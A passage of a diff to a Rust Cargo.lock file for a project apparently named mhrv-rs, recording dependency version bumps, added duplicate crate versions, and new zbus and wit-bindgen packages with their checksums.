+checksum = "1027f7680c853e056ebcec683615fb6fbbc07dbaa13b4d5d9442b146ded4ecef"
+dependencies = [
+ "enumflags2_derive",
+ "serde",
+]
+
+[[package]]
+name = "enumflags2_derive"
+version = "0.7.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "67c78a4d8fdf9953a5c9d458f9efe940fd97a0cab0941c075a813ac594733827"
 dependencies = [
- "heck",
  "proc-macro2",
  "quote",
  "syn 2.0.117",
@@ -1174,6 +1505,23 @@ dependencies = [
  "arrayvec",
 ]
 
+[[package]]
+name = "event-listener"
+version = "2.5.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0206175f82b8d6bf6652ff7d71a1e27fd2e4efde587fd368662814d6ec1d9ce0"
+
+[[package]]
+name = "event-listener"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d93877bcde0eb80ca09131a08d23f0a5c18a620b01db137dba666d18cd9b30c2"
+dependencies = [
+ "concurrent-queue",
+ "parking",
+ "pin-project-lite",
+]
+
 [[package]]
 name = "event-listener"
 version = "5.4.1"
@@ -1191,10 +1539,19 @@ version = "0.5.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "8be9f3dfaaffdae2972880079a491a1a8bb7cbed0b8dd7a347f668b4150a3b93"
 dependencies = [
- "event-listener",
+ "event-listener 5.4.1",
  "pin-project-lite",
 ]
 
+[[package]]
+name = "fastrand"
+version = "1.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e51093e27b0797c359783294ca4f0a911c270184cb10f85783b118614a1501be"
+dependencies = [
+ "instant",
+]
+
 [[package]]
 name = "fastrand"
 version = "2.4.1"
@@ -1328,13 +1685,31 @@ version = "0.3.32"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "cecba35d7ad927e23624b22ad55235f2239cfa44fd10428eecbeba6d6a717718"
 
+[[package]]
+name = "futures-lite"
+version = "1.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "49a9d51ce47660b1e808d3c990b4709f2f415d928835a17dfd16991515c46bce"
+dependencies = [
+ "fastrand 1.9.0",
+ "futures-core",
+ "futures-io",
+ "memchr",
+ "parking",
+ "pin-project-lite",
+ "waker-fn",
+]
+
 [[package]]
 name = "futures-lite"
 version = "2.6.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f78e10609fe0e0b3f4157ffab1876319b5b0db102a2c60dc4626306dc46b44ad"
 dependencies = [
+ "fastrand 2.4.1",
  "futures-core",
+ "futures-io",
+ "parking",
  "pin-project-lite",
 ]
 
@@ -1417,8 +1792,22 @@ checksum = "899def5c37c4fd7b2664648c28120ecec138e4d395b459e5ca34f9cce2dd77fd"
 dependencies = [
  "cfg-if",
  "libc",
- "r-efi",
+ "r-efi 5.3.0",
+ "wasip2",
+]
+
+[[package]]
+name = "getrandom"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0de51e6874e94e7bf76d726fc5d13ba782deca734ff60d5bb2fb2607c7406555"
+dependencies = [
+ "cfg-if",
+ "libc",
+ "r-efi 6.0.0",
+ "rand_core 0.10.1",
  "wasip2",
+ "wasip3",
 ]
 
 [[package]]
@@ -1538,7 +1927,7 @@ dependencies = [
  "presser",
  "thiserror 1.0.69",
  "winapi",
- "windows",
+ "windows 0.52.0",
 ]
 
 [[package]]
@@ -1634,6 +2023,12 @@ version = "0.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea"
 
+[[package]]
+name = "hermit-abi"
+version = "0.3.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d231dfb89cfffdbc30e7fc41579ed6066ad03abda9e567ccafae602b97ec5024"
+
 [[package]]
 name = "hermit-abi"
 version = "0.5.2"
@@ -1654,25 +2049,19 @@ checksum = "dfa686283ad6dd069f105e5ab091b04c62850d3e4cf5d67debad1933f55023df"
 
 [[package]]
 name = "hickory-proto"
-version = "0.25.2"
+version = "0.26.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f8a6fe56c0038198998a6f217ca4e7ef3a5e51f46163bd6dd60b5c71ca6c6502"
+checksum = "a916d0494600d99ecb15aadfab677ad97c4de559e8f1af0c129353a733ac1fcc"
 dependencies = [
- "async-trait",
- "cfg-if",
  "data-encoding",
- "enum-as-inner",
- "futures-channel",
- "futures-io",
- "futures-util",
  "idna",
  "ipnet",
+ "jni 0.22.4",
  "once_cell",
- "rand 0.9.4",
+ "rand 0.10.1",
  "ring",
  "thiserror 2.0.18",
  "tinyvec",
- "tokio",
  "tracing",
  "url",
 ]
@@ -1810,6 +2199,12 @@ dependencies = [
  "zerovec",
 ]
 
+[[package]]
+name = "id-arena"
+version = "2.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3d3067d79b975e8844ca9eb072e16b31c3c1c36928edf9c6789548c524d0d954"
+
 [[package]]
 name = "idna"
 version = "1.1.0"
@@ -1852,6 +2247,28 @@ checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9"
 dependencies = [
  "equivalent",
  "hashbrown 0.17.0",
+ "serde",
+ "serde_core",
+]
+
+[[package]]
+name = "instant"
+version = "0.1.13"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e0242819d153cba4b4b05a5a8f2a7e9bbf97b6055b2a002b395c96b5ff3c0222"
+dependencies = [
+ "cfg-if",
+]
+
+[[package]]
+name = "io-lifetimes"
+version = "1.0.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "eae7b9aee968036d54dce06cebaefd919e4472e753296daccd6d344e3e2df0c2"
+dependencies = [
+ "hermit-abi 0.3.9",
+ "libc",
+ "windows-sys 0.48.0",
 ]
 
 [[package]]
@@ -2030,6 +2447,12 @@ version = "1.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe"
 
+[[package]]
+name = "leb128fmt"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09edd9e8b54e49e587e4f6295a7d29c3ea94d469cb40ab8ca70b288248a81db2"
+
 [[package]]
 name = "libc"
 version = "0.2.185"
@@ -2078,6 +2501,12 @@ dependencies = [
  "redox_syscall 0.7.4",
 ]
 
+[[package]]
+name = "linux-raw-sys"
+version = "0.3.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ef53942eb7bf7ff43a617b3e2c1c4a5ecf5944a7c1bc12d7ee39bbb15e5c1519"
+
 [[package]]
 name = "linux-raw-sys"
 version = "0.4.15"
@@ -2160,6 +2589,15 @@ dependencies = [
  "libc",
 ]
 
+[[package]]
+name = "memoffset"
+version = "0.7.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5de893c32cde5f383baa4c04c5d6dbdd735cfd4a794b0debdb2bb1b421da5ff4"
+dependencies = [
+ "autocfg",
+]
+
 [[package]]
 name = "memoffset"
 version = "0.9.1"
@@ -2186,7 +2624,7 @@ dependencies = [
 
 [[package]]
 name = "mhrv-rs"
-version = "1.6.0"
+version = "1.9.25"
 dependencies = [
  "base64 0.22.1",
  "bytes",
@@ -2356,6 +2794,18 @@ dependencies = [
  "tokio",
 ]
 
+[[package]]
+name = "nix"
+version = "0.26.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "598beaf3cc6fdd9a5dfb1630c2800c7acd31df7aaf0f565796fba2b53ca1af1b"
+dependencies = [
+ "bitflags 1.3.2",
+ "cfg-if",
+ "libc",
+ "memoffset 0.7.1",
+]
+
 [[package]]
 name = "nix"
 version = "0.30.1"
@@ -2378,7 +2828,7 @@ dependencies = [
  "cfg-if",
  "cfg_aliases 0.2.1",
  "libc",
- "memoffset",
+ "memoffset 0.9.1",
 ]
 
 [[package]]
@@ -2456,7 +2906,7 @@ version = "0.7.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "680998035259dcfcafe653688bf2aa6d3e2dc05e98be6ab46afb089dc84f1df8"
 dependencies = [
- "proc-macro-crate",
+ "proc-macro-crate 3.5.0",
  "proc-macro2",
  "quote",
  "syn 2.0.117",
@@ -2471,19 +2921,36 @@ dependencies = [
  "malloc_buf",
 ]
 
+[[package]]
+name = "objc-sys"
+version = "0.2.0-beta.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "df3b9834c1e95694a05a828b59f55fa2afec6288359cda67146126b3f90a55d7"
+
 [[package]]
 name = "objc-sys"
 version = "0.3.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "cdb91bdd390c7ce1a8607f35f3ca7151b65afc0ff5ff3b34fa350f7d7c7e4310"
 
+[[package]]
+name = "objc2"
+version = "0.3.0-beta.3.patch-leaks.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7e01640f9f2cb1220bbe80325e179e532cb3379ebcd1bf2279d703c19fe3a468"
+dependencies = [
+ "block2 0.2.0-alpha.6",
+ "objc-sys 0.2.0-beta.2",
+ "objc2-encode 2.0.0-pre.2",
+]
+
 [[package]]
 name = "objc2"
 version = "0.4.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "559c5a40fdd30eb5e344fbceacf7595a81e242529fb4e21cf5f43fb4f11ff98d"
 dependencies = [
- "objc-sys",
+ "objc-sys 0.3.5",
  "objc2-encode 3.0.0",
 ]
 
@@ -2493,7 +2960,7 @@ version = "0.5.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "46a785d4eeff09c14c487497c162e92766fbb3e4059a71840cecc03d9a50b804"
 dependencies = [
- "objc-sys",
+ "objc-sys 0.3.5",
  "objc2-encode 4.1.0",
 ]
 
@@ -2582,6 +3049,15 @@ dependencies = [
  "objc2-metal",
 ]
 
+[[package]]
+name = "objc2-encode"
+version = "2.0.0-pre.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "abfcac41015b00a120608fdaa6938c44cb983fee294351cc4bac7638b4e50512"
+dependencies = [
+ "objc-sys 0.2.0-beta.2",
+]
+
 [[package]]
 name = "objc2-encode"
 version = "3.0.0"
@@ -2694,6 +3170,16 @@ dependencies = [
  "libredox",
 ]
 
+[[package]]
+name = "ordered-stream"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9aa2b01e1d916879f73a53d01d1d6cee68adbb31d6d9177a8cfce093cced1d50"
+dependencies = [
+ "futures-core",
+ "pin-project-lite",
+]
+
 [[package]]
 name = "owned_ttf_parser"
 version = "0.25.1"
@@ -2767,7 +3253,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c835479a4443ded371d6c535cbfd8d31ad92c5d23ae9770a61bc155e4992a3c1"
 dependencies = [
  "atomic-waker",
- "fastrand",
+ "fastrand 2.4.1",
  "futures-io",
 ]
 
@@ -2796,6 +3282,22 @@ dependencies = [
  "miniz_oxide",
 ]
 
+[[package]]
+name = "polling"
+version = "2.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4b2d323e8ca7996b3e23126511a523f7e62924d93ecd5ae73b333815b0eb3dce"
+dependencies = [
+ "autocfg",
+ "bitflags 1.3.2",
+ "cfg-if",
+ "concurrent-queue",
+ "libc",
+ "log",
+ "pin-project-lite",
+ "windows-sys 0.48.0",
+]
+
 [[package]]
 name = "polling"
 version = "3.11.0"
@@ -2804,7 +3306,7 @@ checksum = "5d0e4f59085d47d8241c88ead0f274e8a0cb551f3625263c05eb8dd897c34218"
 dependencies = [
  "cfg-if",
  "concurrent-queue",
- "hermit-abi",
+ "hermit-abi 0.5.2",
  "pin-project-lite",
  "rustix 1.1.4",
  "windows-sys 0.61.2",
@@ -2861,13 +3363,33 @@ version = "0.3.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e8cf8e6a8aa66ce33f63993ffc4ea4271eb5b0530a9002db8455ea6050c77bfa"
 
+[[package]]
+name = "prettyplease"
+version = "0.2.37"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b"
+dependencies = [
+ "proc-macro2",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "proc-macro-crate"
+version = "1.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7f4c021e1093a56626774e81216a4ce732a735e5bad4868a03f3ed65ca0c3919"
+dependencies = [
+ "once_cell",
+ "toml_edit 0.19.15",
+]
+
 [[package]]
 name = "proc-macro-crate"
 version = "3.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e67ba7e9b2b56446f1d419b1d807906278ffa1a658a8a5d8a39dcb1f5a78614f"
 dependencies = [
- "toml_edit",
+ "toml_edit 0.25.11+spec-1.1.0",
 ]
 
 [[package]]
@@ -2913,7 +3435,13 @@ dependencies = [
 name = "r-efi"
 version = "5.3.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f"
+checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f"
+
+[[package]]
+name = "r-efi"
+version = "6.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f8dcc9c7d52a811697d2151c701e0d08956f92b0e24136cf4cf27b57a6a0d9bf"
 
 [[package]]
 name = "rand"
@@ -2936,6 +3464,17 @@ dependencies = [
  "rand_core 0.9.5",
 ]
 
+[[package]]
+name = "rand"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d2e8e8bcc7961af1fdac401278c6a831614941f6164ee3bf4ce61b7edb162207"
+dependencies = [
+ "chacha20",
+ "getrandom 0.4.2",
+ "rand_core 0.10.1",
+]
+
 [[package]]
 name = "rand_chacha"
 version = "0.3.1"
@@ -2974,6 +3513,12 @@ dependencies = [
  "getrandom 0.3.4",
 ]
 
+[[package]]
+name = "rand_core"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "63b8176103e19a2643978565ca18b50549f6101881c443590420e4dc998a3c69"
+
 [[package]]
 name = "raw-window-handle"
 version = "0.5.2"
@@ -3153,6 +3698,20 @@ dependencies = [
  "nom",
 ]
 
+[[package]]
+name = "rustix"
+version = "0.37.28"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "519165d378b97752ca44bbe15047d5d3409e875f39327546b42ac81d7e18c1b6"
+dependencies = [
+ "bitflags 1.3.2",
+ "errno",
+ "io-lifetimes",
+ "libc",
+ "linux-raw-sys 0.3.8",
+ "windows-sys 0.48.0",
+]
+
 [[package]]
 name = "rustix"
 version = "0.38.44"
@@ -3163,7 +3722,7 @@ dependencies = [
  "errno",
  "libc",
  "linux-raw-sys 0.4.15",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]
@@ -3298,6 +3857,28 @@ dependencies = [
  "zmij",
 ]
 
+[[package]]
+name = "serde_repr"
+version = "0.1.20"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "175ee3e80ae9982737ca543e96133087cbd9a485eecc3bc4de9c1a37b47ea59c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "sha1"
+version = "0.10.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e3bf829a2d51ab4a5ddf1352d8470c140cadc8301b2ae1789db023f01cedd6ba"
+dependencies = [
+ "cfg-if",
+ "cpufeatures 0.2.17",
+ "digest",
+]
+
 [[package]]
 name = "sha2"
 version = "0.10.9"
@@ -3305,7 +3886,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283"
 dependencies = [
  "cfg-if",
- "cpufeatures",
+ "cpufeatures 0.2.17",
  "digest",
 ]
 
@@ -3449,6 +4030,16 @@ dependencies = [
  "serde",
 ]
 
+[[package]]
+name = "socket2"
+version = "0.4.10"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9f7916fc008ca5542385b89a3d3ce689953c143e9304a9bf8beec1de48994c0d"
+dependencies = [
+ "libc",
+ "winapi",
+]
+
 [[package]]
 name = "socket2"
 version = "0.6.3"
@@ -3461,9 +4052,9 @@ dependencies = [
 
 [[package]]
 name = "socks5-impl"
-version = "0.8.1"
+version = "0.8.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1eae7c78f163b7805f66493c787d7bad4816146faf0cf655d57c78b90c383ce3"
+checksum = "150816c2d954315f351129f438f851285e1ddb6d6ccc850ddd45c523d19abda0"
 dependencies = [
  "async-trait",
  "bytes",
@@ -3566,8 +4157,8 @@ version = "3.27.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd"
 dependencies = [
- "fastrand",
- "getrandom 0.3.4",
+ "fastrand 2.4.1",
+ "getrandom 0.4.2",
  "once_cell",
  "rustix 1.1.4",
  "windows-sys 0.61.2",
@@ -3709,7 +4300,7 @@ dependencies = [
  "parking_lot",
  "pin-project-lite",
  "signal-hook-registry",
- "socket2",
+ "socket2 0.6.3",
  "tokio-macros",
  "windows-sys 0.61.2",
 ]
@@ -3748,6 +4339,12 @@ dependencies = [
  "tokio",
 ]
 
+[[package]]
+name = "toml_datetime"
+version = "0.6.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "22cddaf88f4fbc13c51aebbf5f8eceb5c7c5a9da2ac40a13519eb5b0a0e8f11c"
+
 [[package]]
 name = "toml_datetime"
 version = "1.1.1+spec-1.1.0"
@@ -3757,6 +4354,17 @@ dependencies = [
  "serde_core",
 ]
 
+[[package]]
+name = "toml_edit"
+version = "0.19.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1b5bb770da30e5cbfde35a2d7b9b8a2c4b8ef89548a7a6aeab5c9a576e3e7421"
+dependencies = [
+ "indexmap",
+ "toml_datetime 0.6.11",
+ "winnow 0.5.40",
+]
+
 [[package]]
 name = "toml_edit"
 version = "0.25.11+spec-1.1.0"
@@ -3764,9 +4372,9 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0b59c4d22ed448339746c59b905d24568fcbb3ab65a500494f7b8c3e97739f2b"
 dependencies = [
  "indexmap",
- "toml_datetime",
+ "toml_datetime 1.1.1+spec-1.1.0",
  "toml_parser",
- "winnow",
+ "winnow 1.0.2",
 ]
 
 [[package]]
@@ -3775,7 +4383,7 @@ version = "1.1.2+spec-1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a2abe9b86193656635d2411dc43050282ca48aa31c2451210f4202550afb7526"
 dependencies = [
- "winnow",
+ "winnow 1.0.2",
 ]
 
 [[package]]
@@ -3891,9 +4499,9 @@ dependencies = [
 
 [[package]]
 name = "tun2proxy"
-version = "0.7.20"
+version = "0.7.21"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0576f75fd691ad86cdc4348f29fb8770037ab8140179f1f9f8f6991f7ebd2176"
+checksum = "d336ad07beb04a9e219972fcdc54a71d2586cdfd35ac03551a629e4ca328db3c"
 dependencies = [
  "android_logger",
  "async-trait",
@@ -3955,6 +4563,17 @@ dependencies = [
  "tokio",
 ]
 
+[[package]]
+name = "uds_windows"
+version = "1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "89daebc3e6fd160ac4aa9fc8b3bf71e1f74fbf92367ae71fb83a037e8bf164b9"
+dependencies = [
+ "memoffset 0.9.1",
+ "tempfile",
+ "winapi",
+]
+
 [[package]]
 name = "unicase"
 version = "2.9.0"
@@ -4039,6 +4658,12 @@ version = "0.0.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "051eb1abcf10076295e815102942cc58f9d5e3b4560e46e53c21e8ff6f3af7b1"
 
+[[package]]
+name = "waker-fn"
+version = "1.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "317211a0dc0ceedd78fb2ca9a44aed3d7b9b26f81870d485c07122b4350673b7"
+
 [[package]]
 name = "walkdir"
 version = "2.5.0"
@@ -4061,7 +4686,16 @@ version = "1.0.3+wasi-0.2.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "20064672db26d7cdc89c7798c48a0fdfac8213434a1186e5ef29fd560ae223d6"
 dependencies = [
- "wit-bindgen",
+ "wit-bindgen 0.57.1",
+]
+
+[[package]]
+name = "wasip3"
+version = "0.4.0+wasi-0.3.0-rc-2026-01-06"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5428f8bf88ea5ddc08faddef2ac4a67e390b88186c703ce6dbd955e1c145aca5"
+dependencies = [
+ "wit-bindgen 0.51.0",
 ]
 
 [[package]]
@@ -4119,6 +4753,40 @@ dependencies = [
  "unicode-ident",
 ]
 
+[[package]]
+name = "wasm-encoder"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "990065f2fe63003fe337b932cfb5e3b80e0b4d0f5ff650e6985b1048f62c8319"
+dependencies = [
+ "leb128fmt",
+ "wasmparser",
+]
+
+[[package]]
+name = "wasm-metadata"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bb0e353e6a2fbdc176932bbaab493762eb1255a7900fe0fea1a2f96c296cc909"
+dependencies = [
+ "anyhow",
+ "indexmap",
+ "wasm-encoder",
+ "wasmparser",
+]
+
+[[package]]
+name = "wasmparser"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe"
+dependencies = [
+ "bitflags 2.11.1",
+ "hashbrown 0.15.5",
+ "indexmap",
+ "semver",
+]
+
 [[package]]
 name = "wayland-backend"
 version = "0.3.15"
@@ -4467,7 +5135,7 @@ version = "0.1.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22"
 dependencies = [
- "windows-sys 0.61.2",
+ "windows-sys 0.48.0",
 ]
 
 [[package]]
@@ -4476,6 +5144,17 @@ version = "0.4.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
 
+[[package]]
+name = "windows"
+version = "0.48.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e686886bc078bc1b0b600cac0147aadb815089b6e4da64016cbd754b6342700f"
+dependencies = [
+ "windows-implement 0.48.0",
+ "windows-interface 0.48.0",
+ "windows-targets 0.48.5",
+]
+
 [[package]]
 name = "windows"
 version = "0.52.0"
@@ -4501,13 +5180,24 @@ version = "0.62.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb"
 dependencies = [
- "windows-implement",
- "windows-interface",
+ "windows-implement 0.60.2",
+ "windows-interface 0.59.3",
  "windows-link",
  "windows-result",
  "windows-strings",
 ]
 
+[[package]]
+name = "windows-implement"
+version = "0.48.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5e2ee588991b9e7e6c8338edf3333fbe4da35dc72092643958ebb43f0ab2c49c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
+
 [[package]]
 name = "windows-implement"
 version = "0.60.2"
@@ -4519,6 +5209,17 @@ dependencies = [
  "syn 2.0.117",
 ]
 
+[[package]]
+name = "windows-interface"
+version = "0.48.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e6fb8df20c9bcaa8ad6ab513f7b40104840c8867d5751126e4df3b08388d0cc7"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
+
 [[package]]
 name = "windows-interface"
 version = "0.59.3"
@@ -4910,6 +5611,15 @@ dependencies = [
  "xkbcommon-dl",
 ]
 
+[[package]]
+name = "winnow"
+version = "0.5.40"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f593a95398737aeed53e489c785df13f3618e41dbcd6718c6addbf1395aa6876"
+dependencies = [
+ "memchr",
+]
+
 [[package]]
 name = "winnow"
 version = "1.0.2"
@@ -4945,12 +5655,100 @@ dependencies = [
  "winreg",
 ]
 
+[[package]]
+name = "wit-bindgen"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5"
+dependencies = [
+ "wit-bindgen-rust-macro",
+]
+
 [[package]]
 name = "wit-bindgen"
 version = "0.57.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1ebf944e87a7c253233ad6766e082e3cd714b5d03812acc24c318f549614536e"
 
+[[package]]
+name = "wit-bindgen-core"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ea61de684c3ea68cb082b7a88508a8b27fcc8b797d738bfc99a82facf1d752dc"
+dependencies = [
+ "anyhow",
+ "heck",
+ "wit-parser",
+]
+
+[[package]]
+name = "wit-bindgen-rust"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b7c566e0f4b284dd6561c786d9cb0142da491f46a9fbed79ea69cdad5db17f21"
+dependencies = [
+ "anyhow",
+ "heck",
+ "indexmap",
+ "prettyplease",
+ "syn 2.0.117",
+ "wasm-metadata",
+ "wit-bindgen-core",
+ "wit-component",
+]
+
+[[package]]
+name = "wit-bindgen-rust-macro"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0c0f9bfd77e6a48eccf51359e3ae77140a7f50b1e2ebfe62422d8afdaffab17a"
+dependencies = [
+ "anyhow",
+ "prettyplease",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "wit-bindgen-core",
+ "wit-bindgen-rust",
+]
+
+[[package]]
+name = "wit-component"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2"
+dependencies = [
+ "anyhow",
+ "bitflags 2.11.1",
+ "indexmap",
+ "log",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "wasm-encoder",
+ "wasm-metadata",
+ "wasmparser",
+ "wit-parser",
+]
+
+[[package]]
+name = "wit-parser"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ecc8ac4bc1dc3381b7f59c34f00b67e18f910c2c0f50015669dde7def656a736"
+dependencies = [
+ "anyhow",
+ "id-arena",
+ "indexmap",
+ "log",
+ "semver",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "unicode-xid",
+ "wasmparser",
+]
+
 [[package]]
 name = "writeable"
 version = "0.6.3"
@@ -5013,6 +5811,16 @@ version = "0.3.10"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "bec9e4a500ca8864c5b47b8b482a73d62e4237670e5b5f1d6b9e3cae50f28f2b"
 
+[[package]]
+name = "xdg-home"
+version = "1.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ec1cdab258fb55c0da61328dc52c8764709b249011b2cad0454c72f0bf10a1f6"
+dependencies = [
+ "libc",
+ "windows-sys 0.59.0",
+]
+
 [[package]]
 name = "xkbcommon-dl"
 version = "0.4.2"
@@ -5070,6 +5878,72 @@ dependencies = [
  "synstructure",
 ]
 
+[[package]]
+name = "zbus"
+version = "3.15.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "675d170b632a6ad49804c8cf2105d7c31eddd3312555cffd4b740e08e97c25e6"
+dependencies = [
+ "async-broadcast",
+ "async-executor",
+ "async-fs",
+ "async-io 1.13.0",
+ "async-lock 2.8.0",
+ "async-process",
+ "async-recursion",
+ "async-task",
+ "async-trait",
+ "blocking",
+ "byteorder",
+ "derivative",
+ "enumflags2",
+ "event-listener 2.5.3",
+ "futures-core",
+ "futures-sink",
+ "futures-util",
+ "hex",
+ "nix 0.26.4",
+ "once_cell",
+ "ordered-stream",
+ "rand 0.8.6",
+ "serde",
+ "serde_repr",
+ "sha1",
+ "static_assertions",
+ "tracing",
+ "uds_windows",
+ "winapi",
+ "xdg-home",
+ "zbus_macros",
+ "zbus_names",
+ "zvariant",
+]
+
+[[package]]
+name = "zbus_macros"
+version = "3.15.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7131497b0f887e8061b430c530240063d33bf9455fa34438f388a245da69e0a5"
+dependencies = [
+ "proc-macro-crate 1.3.1",
+ "proc-macro2",
+ "quote",
+ "regex",
+ "syn 1.0.109",
+ "zvariant_utils",
+]
+
+[[package]]
+name = "zbus_names"
+version = "2.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "437d738d3750bed6ca9b8d423ccc7a8eb284f6b1d6d4e225a0e4e6258d864c8d"
+dependencies = [
+ "serde",
+ "static_assertions",
+ "zvariant",
+]
+
 [[package]]
 name = "zerocopy"
 version = "0.8.48"
@@ -5155,3 +6029,41 @@ name = "zmij"
 version = "1.0.21"
 source = "registry+https://github.com/rust-lang/crates.io-index"
